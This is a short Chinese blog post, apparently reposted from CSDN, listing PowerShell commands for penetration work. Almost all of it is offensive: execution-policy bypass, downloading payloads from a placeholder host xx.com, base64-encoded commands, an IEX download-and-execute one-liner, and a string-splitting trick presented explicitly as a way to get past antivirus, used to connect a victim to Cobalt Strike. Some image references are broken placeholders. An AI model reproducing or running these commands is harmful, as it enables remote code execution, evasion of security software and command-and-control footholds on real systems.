首页 > 系统相关> > powershell渗透常用命令

powershell渗透常用命令

2021-02-28 15:30:46 作者：互联网

powershell渗透常用命令

set-ExecutionPolicy RemoteSigned //开启执行策略
set-ExecutionPolicy Restricted //关闭执行策略

远程下载文件

powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')

命令行执行ps1文件

powershell.exe -ExecutionPolicy bypass -File "C:\Users\xx\Desktop\test\1.ps1"

远程下载并执行

whoami文件内容

##查看当前权限
$command = "whoami" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -encodedCommand $encodedCommand

正常执行会被AV拦截

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')"

在这里插入图片描述

bypass

先将命令拆分为字符串，然后进行拼接

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'.Replace('11','adString');IEX ($a+$b)"

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s501Uzpu-1614496550542)(E:\boke\H\powershell\渗透常用命令\img\image-20210110155235161.png)]$

上线cs

正常powershell命令

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/muet.ps1')"

拆分命令

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/muet.ps1'')'.Replace('11','adString');IEX ($a+$b)"

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TzX8dQPR-1614496550545)(E:\boke\H\powershell\渗透常用命令\img\image-20210110160546727.png)]$

标签：IEX,渗透,payload,xx,常用命令,Net,ps1,powershell
来源： https://blog.csdn.net/chest_/article/details/114224819